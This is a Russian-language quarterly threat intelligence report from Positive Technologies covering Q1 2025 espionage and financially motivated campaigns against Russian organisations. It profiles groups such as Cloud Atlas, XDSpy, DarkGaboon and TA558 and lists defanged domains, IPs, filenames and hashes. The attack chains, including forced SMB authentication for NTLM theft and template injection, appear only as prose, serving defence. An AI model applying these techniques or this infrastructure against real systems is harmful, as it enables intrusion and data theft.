PT Expert Security Center

Квартальный отчет март 2025

Введение

В первом квартале 2025 года российские организации столкнулись с рядом целевых кибератак, инициированных различными хакерскими группировками. В этом отчете рассматриваются наиболее значимые кибератаки за этот период, а также раскрываются методы, инструменты и инфраструктура, используемые злоумышленниками.

Исследование основано на данных из открытых источников, полученных с использованием внутренних систем департамента Threat Intelligence Positive Technologies. В нем приведены примеры атак для каждой выявленной группировки, включая описания цепочек атак, а также индикаторы компрометации (IoC), позволяющие идентифицировать потенциальную угрозу.

Цель отчета — предоставить практическую информацию о текущих угрозах. Материалы могут быть использованы специалистами по информационной безопасности для мониторинга сетевой активности, настройки средств защиты и расследования инцидентов, а также для разработки стратегий предотвращения атак.

Кроме того, отчет может быть полезен руководителям по информационной безопасности, поскольку он содержит актуальные сведения для разработки стратегий кибербезопасности, оценки рисков и совершенствования защитных мер. Данные могут быть применены в рамках планирования программ киберустойчивости, внедрения новых политик безопасности и повышения осведомленности сотрудников о существующих угрозах.

Шпионаж

PhantomCore

Общая информация

  • PhantomCore — это хакерская группировка, впервые описанная российской компанией F.A.C.C.T. в марте 2024 года.
  • Активность группы началась в январе 2024 года, что делает ее относительно новой угрозой в сфере кибершпионажа.
  • Один из тестовых файлов их трояна PhantomRAT был впервые загружен на платформу VirusTotal 26 февраля 2024 года из Киева.

Используемые инструменты и методы

  • Основным инструментом является троян удаленного доступа, названный PhantomRAT.
  • Применяет .NET-приложения с опцией развертывания одним файлом (single file deployment).

География атак

Основными странами, на которые направлены атаки PhantomCore, являются Россия и Беларусь. Их операции имеют четкий географический фокус, вероятно, связанный с геополитическими факторами.

Атакуемые отрасли

Учитывая природу кибершпионажа, можно предположить, что они могут включать стратегически важные отрасли, такие как:

  • энергетика;
  • финансовый сектор;
  • промышленность;
  • государственный сектор;
  • транспортная отрасль;
  • информационные технологии.
Рис. 1. Письмо с конфигурационным RDP-файлом
Рис. 1. Письмо с конфигурационным RDP-файлом
Рис. 2–3. Подключение по RDP к удаленной машине злоумышленников
Рис. 2–3. Подключение по RDP к удаленной машине злоумышленников

Атака, обнаруженная 15 января 2025 года системами TI-департамента, была связана с деятельностью группировки PhantomCore. Основной вектор атаки — использование вредоносного файла, устанавливающего RDP-соединение с доменом platforma-zakupki[.]ru (45.87.246[.]149), ранее замеченным в атаках этой же группировки. Применение RDP-соединений позволяет злоумышленникам скрытно получать доступ к корпоративным системам, используя уязвимости или скомпрометированные учетные данные.

Развитие атаки происходило через рассылку 17 января 2025 года фишинговых писем, содержащих вредоносный файл с расширением .rdp. Запуск файла пользователем предоставлял атакующим доступ к его системе, что открывало следующие векторы угроз:

  • кража учетных данных;
  • кража данных из буфера обмена;
  • доступ к системным и общим дискам;
  • доступ к смарт-картам и подключенным устройствам.

Основная цель атаки — компрометация учетных данных и дальнейшее закрепление в системе жертвы с целью шпионажа или киберпреступной деятельности. Использование RDP в сочетании с перенаправлением локальных ресурсов позволяет злоумышленникам действовать скрытно, получая доступ к критически важной информации и инфраструктуре компании.

Индикаторы компрометации:

Доменыplatforma-zakupki[.]ru
IP-адреса45.87.246[.]149
Имена файловterminalserver.rdp
Адрес отправителяitsupport@<redacted>
Контрольная сумма (MD5)5fe53e8f3dfb6641a98a29cd614021ea
411ccb303430114cf46d1aa3ea0d0092

Cloud Atlas

Общая информация

  • Cloud Atlas — это группировка, занимающаяся кибершпионажем, впервые публично идентифицированная в 2013 году «Лабораторией Касперского» под названием Red October.
  • В 2014 году группировка была замечена под своим текущим именем, Cloud Atlas, и с тех пор активно ведет свои операции. Известна и под другими именами, такими как Clean Ursa, Inception, Oxygen.
  • Происхождение Cloud Atlas остается неизвестным. Однако использование русского сленга в их коде, как указано в отчетах, предполагает, что группировка может происходить из постсоветского пространства.

Используемые инструменты и методы

  • Фишинговые письма: группировка отправляет фишинговые письма с вредоносными вложениями Microsoft Word и Excel для доставки своих вредоносных программ.
  • Методы доставки и уклонения: группировка применяет RTF template injection, а также хостинг вредоносных файлов на легитимных облачных сервисах. Использует легитимные функции Microsoft Office, такие как шаблонные инъекции, для маскировки своих атак.
  • Используемые инструменты: AnyDesk, Putty, LaZagne, PowerShower, VBShower и VBCloud.

География атак

  • Основные страны: Россия, Беларусь, Азербайджан, Турция, Словения, Индия, Казахстан и Чехия.
  • Анализ коллег из Check Point Software показывает, что группировка в основном фокусируется на России, особенно в свете недавнего увеличения активности, связанной со специальной военной операцией.

Атакуемые отрасли

  • государственные учреждения;
  • военно-промышленный комплекс;
  • сельскохозяйственная промышленность.
Рис. 4. Вредоносное письмо со скомпрометированного адреса
Рис. 4. Вредоносное письмо со скомпрометированного адреса
Рис. 5. Вредоносный документ-приманка
Рис. 5. Вредоносный документ-приманка

На протяжении 2025 года TI-департамент продолжает фиксировать атаки на государственные объекты, осуществляемые группировкой Cloud Atlas. Данная кампания была подробно описана в апрельском исследовании экспертного центра безопасности Positive Technologies.

Атаки начинаются с рассылки электронных писем, содержащих документы формата DOC со ссылками на удаленные вредоносные шаблоны (DOTM). При открытии документа загружается вредоносный шаблон, активирующий макросный код, который загружает и запускает бэкдор PowerShower.

Этот бэкдор позволяет злоумышленникам удаленно управлять зараженной системой, устанавливать дополнительные вредоносные модули и собирать данные.

Cloud Atlas использует технику внедрения шаблонов (Template Injection), что помогает ей обходить антивирусные решения, поскольку вредоносный код не содержится в самом документе, а загружается динамически.

Рис. 6. Документ-приманка, не детектируемый антивирусными системами
Рис. 6. Документ-приманка, не детектируемый антивирусными системами

Согласно исследованиям Positive Technologies, целями кампаний хакерской группировки Cloud Atlas являются кибершпионаж, сбор конфиденциальных данных и учетных записей, а также возможный доступ к критически важным системам. В случае успешного заражения злоумышленники могли получить контроль над системами жертв, перехватывать файлы, учетные данные и проводить дальнейшие атаки на связанные объекты.

Индикаторы компрометации:

Доменыmehafon[.]com
officeconfirm.technoguides.[]org
technoguides.orgmirconnect[.]info
jhsdshdkajdhgfyhsfhjshh[.]cfd
web-whatapp[.]net
block-monitor[.]net
cyberservice24[.]com
IP-адреса79.143.87[.]233
188.127.235[.]216
185.99.2[.]168
176.124.33[.]86
80.85.153[.]195
194.87.252[.]14
45.140.169[.]16
Имена файлов222.doc
Приглашение_на_тематический_семинар о_порядке_проведения_работ_по_стандартизации и_унификации_в_рамках_ГОЗ.doc
Контрольная сумма (MD5)3e20d2771e34aa2f468be6c5116ee763
8d9fc934630e22ef50c53772f16335d3
ac872b78dc934d309d2d4fa710858ec6
991a239c18c74239c9382eaac0cec13f
7c26687af337f87fabe8cbfdad040421
07ca69fd588c02f5424b08e0b832ea26
b684c32fe323e10840ea1992d08cfa38

PseudoGamaredon

Общая информация

  • PseudoGamaredon, также известная как Core Werewolf, Awaken Likho и GamaCopy, — это группировка, занимающаяся кибершпионажем, впервые упомянутая в августе 2021 года, когда их вредоносные файлы были обнаружены на платформе VirusTotal.
  • Первое публичное упоминание появилось в сентябре 2022 года в квартальном исследовательском отчете Positive Technologies.
  • Основная цель PseudoGamaredon — кибершпионаж, направленный на сбор конфиденциальной информации.

Используемые инструменты и методы

  • Фишинговые письма: группировка отправляет фишинговые письма с вредоносными вложениями, замаскированными под документы Microsoft Word и PDF, для доставки своих атак.
  • Легитимное ПО: используют UltraVNC и MeshCentral для удаленного доступа к зараженным системам.
  • Доставка через Telegram: с 2024 года группировка начала использовать Telegram для доставки вредоносных файлов.
  • Имитация тактик: группировка имитирует методы других известных групп, таких как Gamaredon. Например, они используют схожие техники доставки и эксплойты, что затрудняет их идентификацию.

География атак

Основной страной, на которую направлены атаки PseudoGamaredon, является Россия.

Атакуемые отрасли

  • энергетика;
  • телекоммуникации;
  • промышленность;
  • государственные учреждения;
  • исследовательские компании;
  • военно-промышленный комплекс.
Рис. 7. Документ-приманка
Рис. 7. Документ-приманка

В конце февраля группа киберразведки зафиксировала целенаправленную атаку с использованием вредоносного архива. Распространяемый файл uvfsb370500000.rar содержал исполняемый EXE с иконкой PDF.

Запустив файл, жертва видит уведомление в формате PDF, якобы отправленное от имени органов ФСБ России. Одновременно с этим на систему незаметно загружается и запускается UltraVNC, который устанавливает соединение с доменом medbruber[.]ru (45.130.151[.]227), зарегистрированным в начале февраля. Этот домен ранее принадлежал легитимной организации, но после его освобождения был перехвачен злоумышленниками.

Основная цель атаки — получение удаленного доступа к системе жертвы. Запуск UltraVNC позволяет атакующим контролировать инфицированное устройство в режиме реального времени, перехватывать пользовательские данные и потенциально выполнять дальнейшие вредоносные действия. Атака была направлена на российскую организацию и использовала приманку, имитирующую официальную корреспонденцию от госструктур, что может говорить о целенаправленном шпионаже или подготовке к масштабированию атаки.

PseudoGamaredon и ранее использовала аналогичные TTP: EXE-файлы с PDF-иконками, поддельные документы от имени госучреждений России и UltraVNC для удаленного контроля зараженных устройств.

Индикаторы компрометации:

Доменыmedbruber[.]ru
IP-адреса45.130.151[.]227
Имена файловuvfsb370500000.rar
Уведомление 2766 о начале комплексной проверки согласно плану утечек.exe
Uved_fsb.pdf
Контрольная сумма (MD5)14fab23292720a90e9ef89fafd4f98bf
3d81438bc5fd572d47f63f2f07d334de
993850714d8cae983899abddf2818a62

PhaseShifters

Общая информация

  • PhaseShifters, также известная как Sticky Werewolf и Angry Likho, — это хакерская группировка, занимающаяся кибершпионажем и атаками.
  • Впервые публично упомянуты Positive Technologies в октябре 2024 года, хотя их активность отслеживается с весны 2023-го.

Используемые инструменты и методы

  • Группировка использует фишинговые письма с вредоносными вложениями, такими как защищенные паролем архивы RAR, часто маскирующиеся под документы для проверки и подписи.
  • Применяют стеганографию, скрывая вредоносное ПО в изображениях и текстовых файлах, что помогает обходить антивирусы.
  • Среди используемых малварей — Rhadamanthys, DarkTrack RAT, Meta Stealer, AsyncRAT, Redline, Remcos, njRAT и XWorm. Они также используют крипторы по подписке (crypters as a service), связанные с группой Blind Eagle, и хранят закодированные полезные нагрузки в репозиториях BitBucket и GitHub.

География атак

Основными странами, на которые направлены атаки, являются Россия, Беларусь и Польша.

Атакуемые отрасли

  • энергетика;
  • строительство;
  • телекоммуникации;
  • промышленность;
  • транспорт;
  • государственные учреждения;
  • исследовательские компании.
Рис. 8. Документ-приманка
Рис. 8. Документ-приманка

В начале января 2025 года системами TI-департамента был обнаружен фишинговый документ якобы от компании из сферы военно-промышленного комплекса (занимается созданием БПЛА). Как и в предыдущих атаках, в документе присутствует обращение к SMB-ресурсу, что позволяет злоумышленникам получить NTLM-хеши пользователя через протокол SMB. Этот метод называется Forced Authentication. Его суть в том, что устройство через шаблон или внешние связи автоматически пытается установить соединение с сервером злоумышленников, что приводит к попытке аутентификации Windows на этом ресурсе. Примером такого подключения служит обращение вредоносного PDF-файла к SMB-ресурсу на сервере с IP-адресом 45.155.249[.]126.

Атаки группировки завершаются подключением жертвы к серверу злоумышленников и добычей NTLM-хешей пользователя, что позволяет злоумышленникам получить доступ к внутренним системам и ресурсам организации.

В ходе поиска других файлов, связанных с вышеуказанным IP-адресом, было выявлено еще несколько вредоносных документов для атак на организации и государственные объекты.

Рис. 9–12. Документы-приманки

Документы-приманки
Документы-приманки
Документы-приманки
Документы-приманки
Документы-приманки
Документы-приманки
Документы-приманки
Документы-приманки

В феврале группа киберразведки также фиксировала фишинговые DOCX-документы, осуществляющие SMB-сканирование и взаимодействующие с IP-адресом 31.214.157[.]162. Атаки были нацелены на организации России и Беларуси. Эти документы также использовали метод Forced Authentication через SMB, а в метаданных документов присутствовала украинская раскладка.

Рис. 13. Языковые пакеты, присутствующие в документах-приманках
Рис. 13. Языковые пакеты, присутствующие в документах-приманках

Индикаторы компрометации:

IP-адреса45.155.249[.]126
31.214.157[.]162
31.214.157[.]49
Имена файловАО <redacted>-1128-24.docx
Запрос провайдер.docx
2_Перечень_<redacted>_оборудования.docx
3946-24.docx
список рассылки.docx
Письмо в организации по привлечению осужденных.docx
материалы презентации.rar
Контрольная сумма (MD5)73babaaae71c5f75d9571d6bad4e3639
4ee964a2bcd28fac1ea1d8c01c2d0ac6
ac0d5722fddab6df66ba32f52c485ab7
feee0cdb734a0dc0a5d517c747ded3fd
5f2be3087b58498fe140b6f3e4fe1ebc
38f4e07b637f8a0e9d833585b17e9110
bc76a5b19526afd415153f288bee5cfb

Telemancon

Общая информация

Хакерская группировка Telemancon привлекла внимание специалистов по кибербезопасности из-за своей активности, направленной на российские промышленные организации. Исследования, проведенные компанией F6, указывают на то, что группировка, вероятно, имеет «прогосударственную» природу, что предполагает связь с иностранными спецслужбами.

Используемые инструменты и методы

  • TMCDropper: дроппер с вариантами на C++ и C#, используемый для начального внедрения.
  • TMCShell: бэкдор, обеспечивающий удаленный доступ и управление.
  • Для связи с C2-сервером применяется платформа telegra.ph, где URL генерируется динамически на основе текущей даты, что затрудняет обнаружение.

География атак

Основной целью группировки является Россия.

Атакуемые отрасли

  • промышленность;
  • государственные учреждения;
  • военно-промышленный комплекс.
Рис. 14. Фишинговое письмо от имени ФСТЭК с вирусным вложением
Рис. 14. Фишинговое письмо от имени ФСТЭК с вирусным вложением

В начале февраля группой киберразведки Positive Technologies было замечено EML-письмо в адрес российской компании из машиностроительного сектора. Письмо содержало запароленный архив с вредоносным исполняемым SRC-файлом.

При запуске исполняемого файла запускается документ-приманка, представляющая из себя письмо с указаниями из ФСТЭК России.

Рис. 15. Вредоносный SRC-файл, подгружающий документ-приманку
Рис. 15. Вредоносный SRC-файл, подгружающий документ-приманку

Одновременно с этим исполняемый файл:

  • Добавляет себя в автозагрузку через реестр.
  • Создает и перемещает файлы в системных папках.
  • Запускает PDF-файл для отвлечения внимания жертвы.
  • Выполняет сетевые запросы (ping) к адресу 127.1.2.1.

После закрепления и отображения документа-приманки, вредоносное ПО извлекает из себя и сохраняет вредоносный PowerShell-скрипт, который потом инициирует взаимодействие с С2-сервером.

Проверка файла через PT Sandbox также показала его вредоносность.

Рис. 16. Вердикт PT Sandbox
Рис. 16. Вердикт PT Sandbox

Telemancon имеет возможную связь с группой, также известной как PseudoGamaredon, которая использует техники, схожие с Gamaredon. Однако атрибуция остается сложной из-за риска операций под фальшивым флагом, что подчеркивает необходимость дальнейших исследований.

Индикаторы компрометации:

Адрес отправителяufo@<redacted>.ru
Имена файловзапрос5161.7z
20250203_5_161.scr
Контрольная сумма (MD5)0ab832ae8d92a1e3f979026e1a9727bf
ebee9a2bf4d0324190281d5ff419116f

XDSpy

Общая информация

  • XDSpy — группировка, занимающаяся кибершпионажем, активная с 2011 года.
  • Их впервые обнаружила белорусская компания CERT.BY в феврале 2020 года, а подробности раскрыла ESET в октябре 2020 года.
  • Их цель — кража документов, особенно из военных и дипломатических учреждений.

Используемые инструменты и методы

  • Используют целевой фишинг (spear phishing) с вредоносными файлами (RAR, ZIP, PowerPoint, LNK).
  • Их инструменты включают XDDown, XDRecon, XDList, XDMonitor, XDUpload, XDLoc, XDPass и DSDownloader для сбора данных и мониторинга систем.

География атак

Основные цели — Беларусь, Россия, Сербия, Молдова, Украина.

Атакуемые отрасли

  • энергетика;
  • финансовый сектор;
  • промышленность;
  • государственные учреждения;
  • военно-промышленный комплекс;
  • авиационно-космическая промышленность.
Рис. 17. Фишинговое письмо
Рис. 17. Фишинговое письмо

В середине марта группой киберразведки Positive Technologies была зафиксирована новая кампания хакерской группировки XDSpy, направленная на компрометацию государственных организаций и органов власти России.

Злоумышленники используют фишинговые письма, отправляемые с поддельных адресов, маскируясь под доверенные источники. В содержании сообщений применяются элементы социальной инженерии, побуждающие жертв перейти по вредоносной ссылке.

При переходе по ссылке жертва скачивает ZIP-архив.

Рис. 18. Содержимое архива, скачиваемого по ссылке в письме
Рис. 18. Содержимое архива, скачиваемого по ссылке в письме

Архив содержит LNK-файл, название которого совпадает с темой письма, а также файл, замаскированный под INI-документ, который на самом деле является архивом с легитимным исполняемым файлом (.exe), вредоносной DLL-библиотекой и конфигурационным файлом (.cfg), представляющим собой PDF-документ-приманку.

Рис. 19. Документ-приманка
Рис. 19. Документ-приманка

При запуске LNK-файла активируется встроенный сценарий, который создает и запускает исполняемый файл. Последний, в свою очередь, выполняет дополнительные операции, включая распаковку вложенного архива и запуск из него исполняемого файла.

Этот файл представляет собой легитимный исполняемый файл, запускающий вредоносную DLL-библиотеку для скачивания полезной нагрузки.

Индикаторы компрометации:

Доменыsogrevayushchiynapitok[.]com
quan-miami[.]com
zelenyysalat[.]com
pdf-bazaar[.]com
pdfdepozit[.]com
file-bazar[.]com
vashazagruzka365[.]com
IP-адреса66.29.146[.]48
216.252.233[.]7
89.45.67[.]2
23.254.225[.]21
147.79.120[.]7
179.43.183[.]46
66.29.137[.]48
Имена файловproyekt.zip
dokazatelstva.zip
проект_09318205.lnk
проект_08811127.lnk
проект_00252053.lnk
доказательства_0006982.lnk
доказательства_099543.lnk
доказательства_0007093.lnk
доказательства_089741.lnk
доказательства_034464.lnk
доказательства_000224.lnk
доказательства_066551.lnk
test.cfg
DeviceMetadataWizard.exe
Адрес отправителяtitov@cf-systems.ru
o.svirida@kontiplus.ru
Контрольная сумма (MD5)fae06cd491519b67a08739365bd40ff2
c402f9d8ae02450613e871584047ba2c
3d529f6f077eae5c7c2830729f20689f
d8c1609d82a74843dc795128121c190c
fb127a60b29af914eebdf87121320224
cb36db26550d804add58f92fe636d120
40e14abd06af70230849704760272cea
2bdd91c8b815db57708c288d0b5b0934
5e5ca319bcb2630c7b86af9348cea0e7
a3c450458c18090b0c514baa364b7651
cbc37e28da9f512456704658b55e06ae
6ef03a145e4af940f8eb804b5379695b
d0907aae24c3721d56e29a5e178cfcc4
5daf7a4f8ec97c0cd5013378712f816d
17d9277bac3f58ab11d7e7a9c73bb8d3 
987822015413905afe5a95797fdbdd1d
d5b1c03f2f09579f7cdcdde8db779671
129399b838d6526751faf16ecea92942
5692f9da3882563d9f45a3bb6deb52ad
e2a1207456d586f3f3680454310fba8f

Финансово мотивированные группировки

DarkGaboon

Общая информация

  • DarkGaboon — хакерская группировка, впервые выявленная департаментом киберразведки экспертного центра безопасности Positive Technologies в октябре 2024 года.
  • Вероятно, базируется в России или в стране со значительным русскоязычным населением. Предположение основано на нескольких языковых и культурных индикаторах:
    • Использование русского языка в фишинговых письмах, включая отсутствие ошибок в русском тексте.
    • Использование русской обсценной лексики в сертификатах X.509.

Используемые инструменты и методы

  • Revenge RAT — троян удаленного доступа, используемый для компрометации систем.
  • Фишинговые письма: группировка отправляет фишинговые письма с вредоносными вложениями, замаскированными под легитимные документы.
  • Подпись malware: все образцы Revenge RAT подписаны фальшивыми сертификатами X.509, которые содержат русские термины, такие как «Акт сверки», 1С-Коннект, названия городов, брендов вроде Marvel и Coca Cola.

География атак

Основной страной, на которую направлены атаки DarkGaboon, является Россия.

Атакуемые отрасли

  • финансовый сектор;
  • телекоммуникации;
  • транспорт;
  • неправительственные организации.
Рис. 20. Документ-приманка
Рис. 20. Документ-приманка

В 2025 году группой киберразведки Positive Technologies также фиксировались атаки DarkGaboon.

Как и в прошлогодних атаках DarkGaboon отправляет целевые фишинговые электронные письма, содержащие ZIP-архивы с вложениями, мимикрирующими под финансовые документы.

Помимо документов-приманок, внутри ZIP-файлов находятся вредоносные исполняемые файлы, замаскированные под PDF-файлы, защищенные .NET Reactor для обхода обнаружения. Когда пользователь запускает исполняемый файл, устанавливается Revenge RAT, что позволяет злоумышленникам удаленно контролировать зараженную систему и красть чувствительную финансовую информацию.

Индикаторы компрометации:

Доменыkilimanjaro.bigmoney[.]biz
kilimanjaro.crabdance[.]com
kilimanjaro.theworkpc[.]com
kilimanjaro.run[.]place
burkinafaso.duckdns[.]org
kilimanjaro.dns[.]army
rampage.myvnc[.]com
IP-адреса31.13.224[.]86
Имена файловOбразeц.rtf
Накладная.doc
nakladnaya.doc
Акт сверки взаиморасчетов по состоянию на 21.02.2025 года.pdf.exe
Договор на оказание услуг № 104 от 26.12.2024 года.exe
Контрольная сумма (MD5)95022756ca3e6bcdbe415501500a7d52
17d70774bd715ffcf2de782c6f48d1c0
2f69c44dd1794288862e026d0598dc37
fb2def2999f11da3481ade55095ce4d8
f97195800fefe4eeb48041cd7a162a7d
79955ef985e7c09a76a6d04220f85627

TA558

Общая информация

  • TA558 — финансово мотивированная киберпреступная группировка, впервые публично идентифицированная компанией Proofpoint в апреле 2018 года, также известна как Odyssey Spider.
  • Происхождение TA558 остается неизвестным.
  • Группировка сосредоточена на финансовой выгоде, достигаемой через кражу данных, включая пользовательские данные и номера кредитных карт.

Используемые инструменты и методы

  • Малвари: группировка применяет множество RAT, включая Loda RAT, Vjw0rm, Revenge RAT, Agent Tesla, Remcos RAT, LokiBot, GuLoader, Snake Keylogger и XWorm.
  • Методы доставки: фишинговые письма с темами, связанными с бронированием номеров, заказами и резервированием, часто на португальском, испанском и английском языках.
  • Новые техники: с 2024 года TA558 начала использовать стеганографию для скрытия вредоносного кода в изображениях.

География атак

  • Латинская Америка: основной регион, где группировка преимущественно атакует носителей португальского и испанского языков.
  • Западная Европа: регион также подвергается атакам, хотя в меньшей степени, с использованием аналогичных методов.
  • Северная Америка: отмечены атаки на организации, особенно в секторе гостиничного бизнеса.
  • Россия и Беларусь: в 2024 году группировка начала активно атаковать эти страны, нацеливаясь на предприятия в финансовом, логистическом, строительном и промышленном секторах, а также на государственные учреждения.

Атакуемые отрасли

  • энергетика;
  • промышленность;
  • транспорт;
  • неправительственные организации.
Рис. 21–22. Фишинговое письмо с вирусным документом
Рис. 21–22. Фишинговое письмо с вирусным документом

В конце января группой киберразведки Positive Technologies было обнаружено фишинговое почтовое сообщение с мимикрией под болгарскую компанию. Для убедительности в теле письма также использовался болгарский язык.

Письмо содержит вложение, загружающее с удаленного командного сервера 152.228.229[.]214 и запускающее RTF-документ (см. рис. ниже), который использует уязвимость CVE-2017-11882 для загрузки и запуска HTA-файла со скрытым обфусцированным VBS-сценарием. При выполнении этого сценария на устройстве жертвы запускается программа Remcos RAT, позволяющая преступникам контролировать устройство жертвы.

Рис. 23. RTF-файл, использующий уязвимость CVE-2017-11882
Рис. 23. RTF-файл, использующий уязвимость CVE-2017-11882

Атака нацелена на установление постоянного удаленного контроля над зараженными системами. Полученный доступ позволил бы злоумышленникам не только осуществлять мониторинг и сбор конфиденциальной информации, но и использовать устройства жертв для дальнейших операций, таких как кибершпионаж, рассылка спама и распространение дополнительного вредоносного ПО.

Индикаторы компрометации:

IP-адреса152.228.229[.]214
Адрес отправителяinfo@preciholes.com
Имена файлов20586183.eml
София1.docx
Sofia1.docx
Контрольная сумма (MD5)b32ca4ff80111873bb76fc0c5ae27b9f
869986f7e1519857e89fa1ffa2061150

DarkWatchman

Общая информация

  • DarkWatchman, также известная как Hive0117, — финансово мотивированная киберпреступная группировка, впервые замеченная исследователями из Prevailion в ноябре 2021 года.
  • Первые упоминания DarkWatchman RAT появились на русскоязычных подпольных форумах в 2021 году, что предполагает возможное происхождение операторов из стран постсоветского пространства. Это предположение основано на использовании русского языка в их кампаниях.

Используемые инструменты и методы

  • DarkWatchman RAT — JavaScript-based RAT, который использует fileless-техники для хранения данных в реестре Windows.
  • Методы доставки: группировка использует SEO poisoning для продвижения мошеннических веб-сайтов через поисковые системы, что отличает их от традиционного фишинга через электронные письма. Они также применяют целевой фишинг: электронные письма c ZIP-архивами, содержащими инвойсы, связанные с уведомлениями о сроке хранения грузов.

География атак

Основными странами, на которые направлены атаки DarkWatchman, являются Россия, Казахстан и Армения.

Атакуемые отрасли

  • финансовый сектор;
  • государственные учреждения.

Рис. 24–25. Фишинговые письма в рамках кампании 2025 года

Фишинговые письма в рамках кампании 2025 года
Фишинговые письма в рамках кампании 2025 года
Фишинговые письма в рамках кампании 2025 года
Фишинговые письма в рамках кампании 2025 года

В ходе мониторинга угроз группа киберразведки в феврале 2025 года обнаружила фишинговые рассылки группировки DarkWatchman. В почтовых сообщениях группировки находятся вложения в виде архива, содержащего исполняемый файл с соответствующим теме письма названием.

Запуск загруженного файла приводит к установке бэкдора DarkWatchman. Он использует ключ реестра HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM для хранения конфигурационной информации, включая тело кейлоггера, закодированное в Base64-строку.

С помощью инструментов управления Windows и доступа к реестру вредоносное ПО собирает сведения о версии операционной системы, имени компьютера и пользователя, часовом поясе, языке, а также информацию об установленных антивирусных программах и передает эти данные на командный сервер.

Вредоносное ПО группировки направлено на получение критически важной информации, что позволяет злоумышленникам получать детальный контроль над зараженной системой.

Индикаторы компрометации:

Домены4ad74aab[.]site
4ad74aab[.]online
4ad74aab[.]shop
4ad74aab[.]store
4ad74aab[.]space
fssp[.]website
IP-адреса192.64.119[.]14
45.77.249[.]79
95.211.190[.]243
185.159.131[.]10
195.149.114[.]21
Адрес отправителяmail@fssp.website
s-n-t111@mail.ru
Адрес отправителяНакладная №171-8314-0617.zip
Исполнительный лист №1710646-25 от 03.02.2025.zip
Накладная №171-8314-0617.exe
Накладная №271-6414-0814.exe
Док-ты на рассчет ФЕВРАЛЬ-МАРТ.exe
Исполнительный лист №1710646-25 от 03.02.2025.exe
Контрольная сумма (MD5)361e748f9cdef7a1aeea083ace075a64
e92504236891ef735190f8cedaf2f900
5c0f7b01d27c70902781541bfc4e7c6e
8933c6df4b683473698fa960495c3269
140c148ef7e476e3d3b2772292a4eb9a
712263e28dd4e31336c66a77ac73222d
5eb5312a5918660df81830b71243726b
b51d8d8408bf9ef0008ba7a27f6f7825

Rare Wolf

Общая информация

Rare Wolf — вероятно, финансово мотивированная киберпреступная группировка, впервые упомянутая в июле 2023 года, когда BI.ZONE Threat Intelligence опубликовала отчет о новой группе, использующей легитимное программное обеспечение для атак на гостиничную индустрию.

Используемые инструменты и методы

  • Фишинговые письма: группировка отправляет фишинговые письма с поддельными накладными.
  • Легитимное программное обеспечение: после получения первоначального доступа группировка устанавливает легитимные инструменты мониторинга, например Mipko Employee Monitor для мониторинга активности жертв и кражи чувствительных данных или AnyDesk для удаленного доступа.

География атак

Основной страной, на которую направлены атаки, является Россия.

Атакуемые отрасли

  • строительство;
  • телекоммуникации;
  • финансовый сектор;
  • военно-промышленный комплекс;
  • неправительственные организации.

С начала 2025 года команда киберразведки PT ESC фиксирует новые серверы управления, используемые группировкой, а также инструменты, задействованные в атаках.

Рис. 26. Тестовая инфраструктура хакерской группировки
Рис. 26. Тестовая инфраструктура хакерской группировки

Так, в конце января фиксировалась стадия подготовки группировкой новых атак: выявлен удаленный сервер с семплами вредоносной нагрузки, при изучении которых выявлены новые подходы к закреплению.

Рис. 27. Фишинговое письмо с вредоносным вложением
Рис. 27. Фишинговое письмо с вредоносным вложением

Атака начинается с отправки пользователю файла с расширением .scr или .exe, который маскируется под легитимный документ. После открытия этого файла создается скрипт find.cmd, запускающий так называемый документ-заглушку. Этот скрипт выполняет несколько задач: скачивает дополнительные инструменты для дальнейшей атаки, настраивает систему для отправки украденной информации по почте и устанавливает AnyDesk для удаленного доступа.

Атака завершается установкой дополнительных вредоносных инструментов, что позволяет злоумышленникам контролировать систему жертвы и получать доступ к конфиденциальным данным. Такие действия направлены на достижение полного контроля над инфраструктурой жертвы, включая сбор и отправку информации, а также использование удаленного доступа для последующих атак.

Индикаторы компрометации:

Доменыvniir[.]space
vniir[.]nl
office-email[.]ru
center-mail[.]ru
downdown[.]ru
redaction-voenmeh[.]info
mail-cheker[.]nl
anyhostings[.]ru
hostingforme[.]nl
IP-адреса45.83.192[.]163
92.63.173[.]61 
185.125.51[.]5 
107.180.112[.]239 
92.63.173[.]62
Адрес отправителяsilaev@hostingforme.nl
Имена файловИсх_ЦИКЛ_Постановка_ЭКБ_РИД Испытания.pdf.exe
1C.Предприятие.Платежное поручение.scr
Контрольная сумма (MD5)afda09d9ced2ef27c5281d5136039c6b
a8a5cca4abac6b158d41b653eacc9a16
fb57e1c8df1d42d7bdc4f120abe0e1d2

Palmiralkm, или Наливные полы в Санкт-Петербурге

Рис. 28. Фишинговое письмо
Рис. 28. Фишинговое письмо

В конце января группой киберразведки TI-департамента было обнаружено письмо якобы от имени Ministry of Human Resources & Emiratisation (Министерства кадровых ресурсов и эмиратизации) с темой «Трудовой договор». Во вложении письма находился архив с расширением .bz.

При его анализе был обнаружен стилер семейства Snake Keylogger — вредоносное программное обеспечение, представляющее серьезную угрозу для безопасности данных.

Snake Keylogger предназначен для скрытого перехвата данных, вводимых с клавиатуры, и сбора конфиденциальной информации, такой как логины, пароли и другие личные сведения. Основная цель хакеров, использующих подобное ПО, — получить доступ к личным или корпоративным учетным записям пользователей. Это может привести к финансовым потерям, утечке чувствительных данных или их продаже на черном рынке.

При детальном анализе EML-файла письма был выявлен IP-адрес отправителя — 185.78.30[.]200. Интересно, что этот же IP-адрес уже использовался в январе текущего года для рассылки другого вредоносного письма, адресованного испаноязычному получателю. В том случае вложение содержало стилер семейства FormBook.

Еще одной примечательной деталью стал выбор фишингового адреса отправителя — palmiralkm[.]ru. Этот домен принадлежит компании из Санкт-Петербурга, занимающейся наливными полами. Вероятно, этот домен был выбран ввиду созвучности с городом Пальмира, находящимся в Сирии, которая имеет тесные отношения с Арабскими Эмиратами.

Индикаторы компрометации:

Доменыpalmiralkm[.]ru
IP-адреса185.78.30[.]200
Адрес отправителяinfo@ palmiralkm.ru
Имена файловMB267382625AE.bz
MB267382625AE.scr 
SiJV.exe 
qxSntIfGZ.exe
Контрольная сумма (MD5)13db5378351dcc931343aa87c0fdcbc7
1a60beaa7081fcb3c29e430a6c8e11be
f43238bfb93550676c942b1253179f07

Хактивизм

Мониторинг хакерских телеграм-каналов

Рис. 29. Диалог в Telegram о найденных уязвимостях
Рис. 29. Диалог в Telegram о найденных уязвимостях

В ходе мониторинга угроз группа киберразведки Positive Technologies выявила утечку доступа к PhpMyAdmin сайта российской компании, специализирующейся на установке систем безопасности.

